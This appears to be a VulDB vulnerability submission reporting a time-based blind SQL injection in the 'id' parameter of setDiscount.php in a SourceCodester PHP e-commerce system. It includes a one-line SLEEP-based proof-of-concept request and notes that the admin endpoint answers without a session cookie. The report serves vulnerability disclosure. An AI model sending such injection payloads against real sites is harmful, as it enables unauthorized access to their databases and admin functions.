| Title | E-Commerce System setDiscount.php SQL Injection Vulnerability |
|---|
| Description | E-Commerce System has a SQL Injection Vulnerability , the vulnerable URI is '/ecommerce/admin/settings/setDiscount.php?id=201737' , and the injectable parameters is id
A time-based blind poc is below:
GET /ecommerce/admin/settings/setDiscount.php?id=201737 AND (SELECT 8973 FROM (SELECT(SLEEP(5)))OoAD) HTTP/1.1
And server will also response even if there's no cookie in the header, which is an improper access control. |
|---|
| Source | ⚠️ https://www.sourcecodester.com/php/13524/e-commerce-system-using-phpmysqli.html |
|---|
| User | WWesleywww (UID 43117) |
|---|
| Submission | 03/20/2023 08:07 (3 years ago) |
|---|
| Moderation | 03/20/2023 08:33 (26 minutes later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 223409 [SourceCodester E-Commerce System 1.0 setDiscount.php ID sql injection] |
|---|
| Points | 20 |
|---|